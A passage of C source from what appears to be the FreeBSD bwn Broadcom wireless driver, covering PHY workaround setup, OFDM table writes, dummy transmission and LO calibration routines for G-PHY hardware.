BWN_PHYTYPE_A || phy->type == BWN_PHYTYPE_G, ("%s:%d: fail", __func__, __LINE__)); if (phy->rev >= 6) { if (phy->type == BWN_PHYTYPE_A) BWN_PHY_MASK(mac, BWN_PHY_OFDM(0x1b), ~0x1000); if (BWN_PHY_READ(mac, BWN_PHY_ENCORE) & BWN_PHY_ENCORE_EN) BWN_PHY_SET(mac, BWN_PHY_ENCORE, 0x0010); else BWN_PHY_MASK(mac, BWN_PHY_ENCORE, ~0x1010); } bwn_wa_init(mac); if (phy->type == BWN_PHYTYPE_G && (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL)) BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x6e), 0xe000, 0x3cf); } static void bwn_wa_write_noisescale(struct bwn_mac *mac, const uint16_t *nst) { int i; for (i = 0; i < BWN_TAB_NOISESCALE_SIZE; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_NOISESCALE, i, nst[i]); } static void bwn_wa_agc(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; if (phy->rev == 1) { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1_R1, 0, 254); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1_R1, 1, 13); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1_R1, 2, 19); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1_R1, 3, 25); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, 0, 0x2710); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, 1, 0x9b83); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, 2, 0x9b83); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, 3, 0x0f8d); BWN_PHY_WRITE(mac, BWN_PHY_LMS, 4); } else { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1, 0, 254); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1, 1, 13); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1, 2, 19); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC1, 3, 25); } BWN_PHY_SETMASK(mac, BWN_PHY_CCKSHIFTBITS_WA, (uint16_t)~0xff00, 0x5700); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x1a), ~0x007f, 0x000f); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x1a), ~0x3f80, 0x2b80); BWN_PHY_SETMASK(mac, BWN_PHY_ANTWRSETT, 0xf0ff, 0x0300); BWN_RF_SET(mac, 0x7a, 0x0008); BWN_PHY_SETMASK(mac, BWN_PHY_N1P1GAIN, ~0x000f, 0x0008); BWN_PHY_SETMASK(mac, BWN_PHY_P1P2GAIN, ~0x0f00, 0x0600); BWN_PHY_SETMASK(mac, BWN_PHY_N1N2GAIN, ~0x0f00, 0x0700); BWN_PHY_SETMASK(mac, BWN_PHY_N1P1GAIN, ~0x0f00, 0x0100); if (phy->rev == 1) BWN_PHY_SETMASK(mac, BWN_PHY_N1N2GAIN, ~0x000f, 0x0007); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x88), ~0x00ff, 0x001c); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x88), ~0x3f00, 0x0200); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x96), ~0x00ff, 0x001c); BWN_PHY_SETMASK(mac, 
BWN_PHY_OFDM(0x89), ~0x00ff, 0x0020); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x89), ~0x3f00, 0x0200); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x82), ~0x00ff, 0x002e); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x96), (uint16_t)~0xff00, 0x1a00); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x81), ~0x00ff, 0x0028); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x81), (uint16_t)~0xff00, 0x2c00); if (phy->rev == 1) { BWN_PHY_WRITE(mac, BWN_PHY_PEAK_COUNT, 0x092b); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x1b), ~0x001e, 0x0002); } else { BWN_PHY_MASK(mac, BWN_PHY_OFDM(0x1b), ~0x001e); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x1f), 0x287a); BWN_PHY_SETMASK(mac, BWN_PHY_LPFGAINCTL, ~0x000f, 0x0004); if (phy->rev >= 6) { BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x22), 0x287a); BWN_PHY_SETMASK(mac, BWN_PHY_LPFGAINCTL, (uint16_t)~0xf000, 0x3000); } } BWN_PHY_SETMASK(mac, BWN_PHY_DIVSRCHIDX, 0x8080, 0x7874); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x8e), 0x1c00); if (phy->rev == 1) { BWN_PHY_SETMASK(mac, BWN_PHY_DIVP1P2GAIN, ~0x0f00, 0x0600); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x8b), 0x005e); BWN_PHY_SETMASK(mac, BWN_PHY_ANTWRSETT, ~0x00ff, 0x001e); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x8d), 0x0002); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3_R1, 0, 0); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3_R1, 1, 7); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3_R1, 2, 16); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3_R1, 3, 28); } else { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3, 0, 0); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3, 1, 7); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3, 2, 16); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3, 3, 28); } if (phy->rev >= 6) { BWN_PHY_MASK(mac, BWN_PHY_OFDM(0x26), ~0x0003); BWN_PHY_MASK(mac, BWN_PHY_OFDM(0x26), ~0x1000); } BWN_PHY_READ(mac, BWN_PHY_VERSION_OFDM); } static void bwn_wa_grev1(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; int i; static const uint16_t bwn_tab_finefreqg[] = BWN_TAB_FINEFREQ_G; static const uint32_t bwn_tab_retard[] = BWN_TAB_RETARD; static const uint32_t bwn_tab_rotor[] = BWN_TAB_ROTOR; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s fail", __func__)); /* init CRSTHRES and ANTDWELL */ if (phy->rev == 1) { BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1_R1, 0x4f19); } else if (phy->rev == 2) { BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1, 0x1861); BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES2, 0x0271); BWN_PHY_SET(mac, BWN_PHY_ANTDWELL, 0x0800); } else { BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1, 0x0098); BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES2, 0x0070); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xc9), 0x0080); BWN_PHY_SET(mac, BWN_PHY_ANTDWELL, 0x0800); } BWN_PHY_SETMASK(mac, BWN_PHY_CRS0, ~0x03c0, 0xd000); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x2c), 0x005a); BWN_PHY_WRITE(mac, BWN_PHY_CCKSHIFTBITS, 0x0026); /* XXX support PHY-A??? */ for (i = 0; i < N(bwn_tab_finefreqg); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_DACRFPABB, i, bwn_tab_finefreqg[i]); /* XXX support PHY-A??? */ if (phy->rev == 1) for (i = 0; i < N(bwn_tab_noise_g1); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, i, bwn_tab_noise_g1[i]); else for (i = 0; i < N(bwn_tab_noise_g2); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, i, bwn_tab_noise_g2[i]); for (i = 0; i < N(bwn_tab_rotor); i++) bwn_ofdmtab_write_4(mac, BWN_OFDMTAB_ROTOR, i, bwn_tab_rotor[i]); /* XXX support PHY-A??? 
*/ if (phy->rev >= 6) { if (BWN_PHY_READ(mac, BWN_PHY_ENCORE) & BWN_PHY_ENCORE_EN) bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g3); else bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g2); } else bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g1); for (i = 0; i < N(bwn_tab_retard); i++) bwn_ofdmtab_write_4(mac, BWN_OFDMTAB_ADVRETARD, i, bwn_tab_retard[i]); if (phy->rev == 1) { for (i = 0; i < 16; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_WRSSI_R1, i, 0x0020); } else { for (i = 0; i < 32; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_WRSSI, i, 0x0820); } bwn_wa_agc(mac); } static void bwn_wa_grev26789(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; int i; static const uint16_t bwn_tab_sigmasqr2[] = BWN_TAB_SIGMASQR2; uint16_t ofdmrev; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s fail", __func__)); bwn_gtab_write(mac, BWN_GTAB_ORIGTR, 0, 0xc480); /* init CRSTHRES and ANTDWELL */ if (phy->rev == 1) BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1_R1, 0x4f19); else if (phy->rev == 2) { BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1, 0x1861); BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES2, 0x0271); BWN_PHY_SET(mac, BWN_PHY_ANTDWELL, 0x0800); } else { BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1, 0x0098); BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES2, 0x0070); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xc9), 0x0080); BWN_PHY_SET(mac, BWN_PHY_ANTDWELL, 0x0800); } for (i = 0; i < 64; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_RSSI, i, i); /* XXX support PHY-A??? */ if (phy->rev == 1) for (i = 0; i < N(bwn_tab_noise_g1); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, i, bwn_tab_noise_g1[i]); else for (i = 0; i < N(bwn_tab_noise_g2); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, i, bwn_tab_noise_g2[i]); /* XXX support PHY-A??? */ if (phy->rev >= 6) { if (BWN_PHY_READ(mac, BWN_PHY_ENCORE) & BWN_PHY_ENCORE_EN) bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g3); else bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g2); } else bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g1); for (i = 0; i < N(bwn_tab_sigmasqr2); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_MINSIGSQ, i, bwn_tab_sigmasqr2[i]); if (phy->rev == 1) { for (i = 0; i < 16; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_WRSSI_R1, i, 0x0020); } else { for (i = 0; i < 32; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_WRSSI, i, 0x0820); } bwn_wa_agc(mac); ofdmrev = BWN_PHY_READ(mac, BWN_PHY_VERSION_OFDM) & BWN_PHYVER_VERSION; if (ofdmrev > 2) { if (phy->type == BWN_PHYTYPE_A) BWN_PHY_WRITE(mac, BWN_PHY_PWRDOWN, 0x1808); else BWN_PHY_WRITE(mac, BWN_PHY_PWRDOWN, 0x1000); } else { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_DAC, 3, 0x1044); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_DAC, 4, 0x7201); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_DAC, 6, 0x0040); } bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_UNKNOWN_0F, 2, 15); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_UNKNOWN_0F, 3, 20); } static void bwn_wa_init(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s fail", __func__)); switch (phy->rev) { case 1: bwn_wa_grev1(mac); break; case 2: case 6: case 7: case 8: case 9: bwn_wa_grev26789(mac); break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } if (siba_get_pci_subvendor(sc->sc_dev) != SIBA_BOARDVENDOR_BCM || siba_get_pci_subdevice(sc->sc_dev) != SIBA_BOARD_BU4306 || siba_get_pci_revid(sc->sc_dev) != 0x17) { if (phy->rev < 2) { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX_R1, 1, 0x0002); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX_R1, 2, 0x0001); } else { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 1, 0x0002); bwn_ofdmtab_write_2(mac, 
BWN_OFDMTAB_GAINX, 2, 0x0001); if ((siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA) && (phy->rev >= 7)) { BWN_PHY_MASK(mac, BWN_PHY_EXTG(0x11), 0xf7ff); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0020, 0x0001); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0021, 0x0001); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0022, 0x0001); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0023, 0x0000); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0000, 0x0000); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0003, 0x0002); } } } if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_FEM) { BWN_PHY_WRITE(mac, BWN_PHY_GTABCTL, 0x3120); BWN_PHY_WRITE(mac, BWN_PHY_GTABDATA, 0xc480); } bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_UNKNOWN_11, 0, 0); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_UNKNOWN_11, 1, 0); } static void bwn_ofdmtab_write_2(struct bwn_mac *mac, uint16_t table, uint16_t offset, uint16_t value) { struct bwn_phy_g *pg = &mac->mac_phy.phy_g; uint16_t addr; addr = table + offset; if ((pg->pg_ofdmtab_dir != BWN_OFDMTAB_DIR_WRITE) || (addr - 1 != pg->pg_ofdmtab_addr)) { BWN_PHY_WRITE(mac, BWN_PHY_OTABLECTL, addr); pg->pg_ofdmtab_dir = BWN_OFDMTAB_DIR_WRITE; } pg->pg_ofdmtab_addr = addr; BWN_PHY_WRITE(mac, BWN_PHY_OTABLEI, value); } static void bwn_ofdmtab_write_4(struct bwn_mac *mac, uint16_t table, uint16_t offset, uint32_t value) { struct bwn_phy_g *pg = &mac->mac_phy.phy_g; uint16_t addr; addr = table + offset; if ((pg->pg_ofdmtab_dir != BWN_OFDMTAB_DIR_WRITE) || (addr - 1 != pg->pg_ofdmtab_addr)) { BWN_PHY_WRITE(mac, BWN_PHY_OTABLECTL, addr); pg->pg_ofdmtab_dir = BWN_OFDMTAB_DIR_WRITE; } pg->pg_ofdmtab_addr = addr; BWN_PHY_WRITE(mac, BWN_PHY_OTABLEI, value); BWN_PHY_WRITE(mac, BWN_PHY_OTABLEQ, (value >> 16)); } static void bwn_gtab_write(struct bwn_mac *mac, uint16_t table, uint16_t offset, uint16_t value) { BWN_PHY_WRITE(mac, BWN_PHY_GTABCTL, table + offset); BWN_PHY_WRITE(mac, BWN_PHY_GTABDATA, value); } static void bwn_dummy_transmission(struct bwn_mac *mac, int ofdm, int paon) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; unsigned int i, max_loop; uint16_t value; uint32_t buffer[5] = { 0x00000000, 0x00d40000, 0x00000000, 0x01000000, 0x00000000 }; if (ofdm) { max_loop = 0x1e; buffer[0] = 0x000201cc; } else { max_loop = 0xfa; buffer[0] = 0x000b846e; } BWN_ASSERT_LOCKED(mac->mac_sc); for (i = 0; i < 5; i++) bwn_ram_write(mac, i * 4, buffer[i]); BWN_WRITE_2(mac, 0x0568, 0x0000); BWN_WRITE_2(mac, 0x07c0, (siba_get_revid(sc->sc_dev) < 11) ? 0x0000 : 0x0100); value = ((phy->type == BWN_PHYTYPE_A) ? 
0x41 : 0x40); BWN_WRITE_2(mac, 0x050c, value); if (phy->type == BWN_PHYTYPE_LP) BWN_WRITE_2(mac, 0x0514, 0x1a02); BWN_WRITE_2(mac, 0x0508, 0x0000); BWN_WRITE_2(mac, 0x050a, 0x0000); BWN_WRITE_2(mac, 0x054c, 0x0000); BWN_WRITE_2(mac, 0x056a, 0x0014); BWN_WRITE_2(mac, 0x0568, 0x0826); BWN_WRITE_2(mac, 0x0500, 0x0000); if (phy->type == BWN_PHYTYPE_LP) BWN_WRITE_2(mac, 0x0502, 0x0050); else BWN_WRITE_2(mac, 0x0502, 0x0030); if (phy->rf_ver == 0x2050 && phy->rf_rev <= 0x5) BWN_RF_WRITE(mac, 0x0051, 0x0017); for (i = 0x00; i < max_loop; i++) { value = BWN_READ_2(mac, 0x050e); if (value & 0x0080) break; DELAY(10); } for (i = 0x00; i < 0x0a; i++) { value = BWN_READ_2(mac, 0x050e); if (value & 0x0400) break; DELAY(10); } for (i = 0x00; i < 0x19; i++) { value = BWN_READ_2(mac, 0x0690); if (!(value & 0x0100)) break; DELAY(10); } if (phy->rf_ver == 0x2050 && phy->rf_rev <= 0x5) BWN_RF_WRITE(mac, 0x0051, 0x0037); } static void bwn_ram_write(struct bwn_mac *mac, uint16_t offset, uint32_t val) { uint32_t macctl; KASSERT(offset % 4 == 0, ("%s:%d: fail", __func__, __LINE__)); macctl = BWN_READ_4(mac, BWN_MACCTL); if (macctl & BWN_MACCTL_BIGENDIAN) printf("TODO: need swap\n"); BWN_WRITE_4(mac, BWN_RAM_CONTROL, offset); BWN_BARRIER(mac, BUS_SPACE_BARRIER_WRITE); BWN_WRITE_4(mac, BWN_RAM_DATA, val); } static void bwn_lo_write(struct bwn_mac *mac, struct bwn_loctl *ctl) { uint16_t value; KASSERT(mac->mac_phy.type == BWN_PHYTYPE_G, ("%s:%d: fail", __func__, __LINE__)); value = (uint8_t) (ctl->q); value |= ((uint8_t) (ctl->i)) << 8; BWN_PHY_WRITE(mac, BWN_PHY_LO_CTL, value); } static uint16_t bwn_lo_calcfeed(struct bwn_mac *mac, uint16_t lna, uint16_t pga, uint16_t trsw_rx) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; uint16_t rfover; uint16_t feedthrough; if (phy->gmode) { lna <<= BWN_PHY_RFOVERVAL_LNA_SHIFT; pga <<= BWN_PHY_RFOVERVAL_PGA_SHIFT; KASSERT((lna & ~BWN_PHY_RFOVERVAL_LNA) == 0, ("%s:%d: fail", __func__, __LINE__)); KASSERT((pga & ~BWN_PHY_RFOVERVAL_PGA) == 0, ("%s:%d: fail", __func__, __LINE__)); trsw_rx &= (BWN_PHY_RFOVERVAL_TRSWRX | BWN_PHY_RFOVERVAL_BW); rfover = BWN_PHY_RFOVERVAL_UNK | pga | lna | trsw_rx; if ((siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA) && phy->rev > 6) rfover |= BWN_PHY_RFOVERVAL_EXTLNA; BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xe300); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, rfover); DELAY(10); rfover |= BWN_PHY_RFOVERVAL_BW_LBW; BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, rfover); DELAY(10); rfover |= BWN_PHY_RFOVERVAL_BW_LPF; BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, rfover); DELAY(10); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xf300); } else { pga |= BWN_PHY_PGACTL_UNKNOWN; BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, pga); DELAY(10); pga |= BWN_PHY_PGACTL_LOWBANDW; BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, pga); DELAY(10); pga |= BWN_PHY_PGACTL_LPF; BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, pga); } DELAY(21); feedthrough = BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE); return (feedthrough); } static uint16_t bwn_lo_txctl_regtable(struct bwn_mac *mac, uint16_t *value, uint16_t *pad_mix_gain) { struct bwn_phy *phy = &mac->mac_phy; uint16_t reg, v, padmix; if (phy->type == BWN_PHYTYPE_B) { v = 0x30; if (phy->rf_rev <= 5) { reg = 0x43; padmix = 0; } else { reg = 0x52; padmix = 5; } } else { if (phy->rev >= 2 && phy->rf_rev == 8) { reg = 0x43; v = 0x10; padmix = 2; } else { reg = 0x52; v = 0x30; padmix = 5; } } if (value) *value = v; if (pad_mix_gain) *pad_mix_gain = padmix; return (reg); } static void bwn_lo_measure_txctl_values(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct 
bwn_phy_g *pg = &phy->phy_g; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; uint16_t reg, mask; uint16_t trsw_rx, pga; uint16_t rf_pctl_reg; static const uint8_t tx_bias_values[] = { 0x09, 0x08, 0x0a, 0x01, 0x00, 0x02, 0x05, 0x04, 0x06, }; static const uint8_t tx_magn_values[] = { 0x70, 0x40, }; if (!BWN_HAS_LOOPBACK(phy)) { rf_pctl_reg = 6; trsw_rx = 2; pga = 0; } else { int lb_gain; trsw_rx = 0; lb_gain = pg->pg_max_lb_gain / 2; if (lb_gain > 10) { rf_pctl_reg = 0; pga = abs(10 - lb_gain) / 6; pga = MIN(MAX(pga, 0), 15); } else { int cmp_val; int tmp; pga = 0; cmp_val = 0x24; if ((phy->rev >= 2) && (phy->rf_ver == 0x2050) && (phy->rf_rev == 8)) cmp_val = 0x3c; tmp = lb_gain; if ((10 - lb_gain) < cmp_val) tmp = (10 - lb_gain); if (tmp < 0) tmp += 6; else tmp += 3; cmp_val /= 4; tmp /= 4; if (tmp >= cmp_val) rf_pctl_reg = cmp_val; else rf_pctl_reg = tmp; } } BWN_RF_SETMASK(mac, 0x43, 0xfff0, rf_pctl_reg); bwn_phy_g_set_bbatt(mac, 2); reg = bwn_lo_txctl_regtable(mac, &mask, NULL); mask = ~mask; BWN_RF_MASK(mac, reg, mask); if (BWN_HAS_TXMAG(phy)) { int i, j; int feedthrough; int min_feedth = 0xffff; uint8_t tx_magn, tx_bias; for (i = 0; i < N(tx_magn_values); i++) { tx_magn = tx_magn_values[i]; BWN_RF_SETMASK(mac, 0x52, 0xff0f, tx_magn); for (j = 0; j < N(tx_bias_values); j++) { tx_bias = tx_bias_values[j]; BWN_RF_SETMASK(mac, 0x52, 0xfff0, tx_bias); feedthrough = bwn_lo_calcfeed(mac, 0, pga, trsw_rx); if (feedthrough < min_feedth) { lo->tx_bias = tx_bias; lo->tx_magn = tx_magn; min_feedth = feedthrough; } if (lo->tx_bias == 0) break; } BWN_RF_WRITE(mac, 0x52, (BWN_RF_READ(mac, 0x52) & 0xff00) | lo->tx_bias | lo-> tx_magn); } } else { lo->tx_magn = 0; lo->tx_bias = 0; BWN_RF_MASK(mac, 0x52, 0xfff0); } BWN_GETTIME(lo->txctl_measured_time); } static void bwn_lo_get_powervector(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; int i; uint64_t tmp; uint64_t power_vector = 0; for (i = 0; i < 8; i += 2) { tmp = bwn_shm_read_2(mac, BWN_SHARED, 0x310 + i); power_vector |= (tmp << (i * 8)); bwn_shm_write_2(mac, BWN_SHARED, 0x310 + i, 0); } if (power_vector) lo->power_vector = power_vector; BWN_GETTIME(lo->pwr_vec_read_time); } static void bwn_lo_measure_gain_values(struct bwn_mac *mac, int16_t max_rx_gain, int use_trsw_rx) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; uint16_t tmp; if (max_rx_gain < 0) max_rx_gain = 0; if (BWN_HAS_LOOPBACK(phy)) { int trsw_rx = 0; int trsw_rx_gain; if (use_trsw_rx) { trsw_rx_gain = pg->pg_trsw_rx_gain / 2; if (max_rx_gain >= trsw_rx_gain) { trsw_rx_gain = max_rx_gain - trsw_rx_gain; trsw_rx = 0x20; } } else trsw_rx_gain = max_rx_gain; if (trsw_rx_gain < 9) { pg->pg_lna_lod_gain = 0; } else { pg->pg_lna_lod_gain = 1; trsw_rx_gain -= 8; } trsw_rx_gain = MIN(MAX(trsw_rx_gain, 0), 0x2d); pg->pg_pga_gain = trsw_rx_gain / 3; if (pg->pg_pga_gain >= 5) { pg->pg_pga_gain -= 5; pg->pg_lna_gain = 2; } else pg->pg_lna_gain = 0; } else { pg->pg_lna_gain = 0; pg->pg_trsw_rx_gain = 0x20; if (max_rx_gain >= 0x14) { pg->pg_lna_lod_gain = 1; pg->pg_pga_gain = 2; } else if (max_rx_gain >= 0x12) { pg->pg_lna_lod_gain = 1; pg->pg_pga_gain = 1; } else if (max_rx_gain >= 0xf) { pg->pg_lna_lod_gain = 1; pg->pg_pga_gain = 0; } else { pg->pg_lna_lod_gain = 0; pg->pg_pga_gain = 0; } } tmp = BWN_RF_READ(mac, 0x7a); if (pg->pg_lna_lod_gain == 0) tmp &= ~0x0008; else tmp |= 0x0008; BWN_RF_WRITE(mac, 0x7a, tmp); } static void bwn_lo_save(struct bwn_mac *mac, struct bwn_lo_g_value 
*sav) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; struct timespec ts; uint16_t tmp; if (bwn_has_hwpctl(mac)) { sav->phy_lomask = BWN_PHY_READ(mac, BWN_PHY_LO_MASK); sav->phy_extg = BWN_PHY_READ(mac, BWN_PHY_EXTG(0x01)); sav->phy_dacctl_hwpctl = BWN_PHY_READ(mac, BWN_PHY_DACCTL); sav->phy_cck4 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x14)); sav->phy_hpwr_tssictl = BWN_PHY_READ(mac, BWN_PHY_HPWR_TSSICTL); BWN_PHY_SET(mac, BWN_PHY_HPWR_TSSICTL, 0x100); BWN_PHY_SET(mac, BWN_PHY_EXTG(0x01), 0x40); BWN_PHY_SET(mac, BWN_PHY_DACCTL, 0x40); BWN_PHY_SET(mac, BWN_PHY_CCK(0x14), 0x200); } if (phy->type == BWN_PHYTYPE_B && phy->rf_ver == 0x2050 && phy->rf_rev < 6) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x16), 0x410); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x17), 0x820); } if (phy->rev >= 2) { sav->phy_analogover = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVER); sav->phy_analogoverval = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVERVAL); sav->phy_rfover = BWN_PHY_READ(mac, BWN_PHY_RFOVER); sav->phy_rfoverval = BWN_PHY_READ(mac, BWN_PHY_RFOVERVAL); sav->phy_classctl = BWN_PHY_READ(mac, BWN_PHY_CLASSCTL); sav->phy_cck3 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x3e)); sav->phy_crs0 = BWN_PHY_READ(mac, BWN_PHY_CRS0); BWN_PHY_MASK(mac, BWN_PHY_CLASSCTL, 0xfffc); BWN_PHY_MASK(mac, BWN_PHY_CRS0, 0x7fff); BWN_PHY_SET(mac, BWN_PHY_ANALOGOVER, 0x0003); BWN_PHY_MASK(mac, BWN_PHY_ANALOGOVERVAL, 0xfffc); if (phy->type == BWN_PHYTYPE_G) { if ((phy->rev >= 7) && (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA)) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, 0x933); } else { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, 0x133); } } else { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, 0); } BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x3e), 0); } sav->reg0 = BWN_READ_2(mac, 0x3f4); sav->reg1 = BWN_READ_2(mac, 0x3e2); sav->rf0 = BWN_RF_READ(mac, 0x43); sav->rf1 = BWN_RF_READ(mac, 0x7a); sav->phy_pgactl = BWN_PHY_READ(mac, BWN_PHY_PGACTL); sav->phy_cck2 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x2a)); sav->phy_syncctl = BWN_PHY_READ(mac, BWN_PHY_SYNCCTL); sav->phy_dacctl = BWN_PHY_READ(mac, BWN_PHY_DACCTL); if (!BWN_HAS_TXMAG(phy)) { sav->rf2 = BWN_RF_READ(mac, 0x52); sav->rf2 &= 0x00f0; } if (phy->type == BWN_PHYTYPE_B) { sav->phy_cck0 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x30)); sav->phy_cck1 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x06)); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x30), 0x00ff); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x06), 0x3f3f); } else { BWN_WRITE_2(mac, 0x3e2, BWN_READ_2(mac, 0x3e2) | 0x8000); } BWN_WRITE_2(mac, 0x3f4, BWN_READ_2(mac, 0x3f4) & 0xf000); tmp = (phy->type == BWN_PHYTYPE_G) ? 
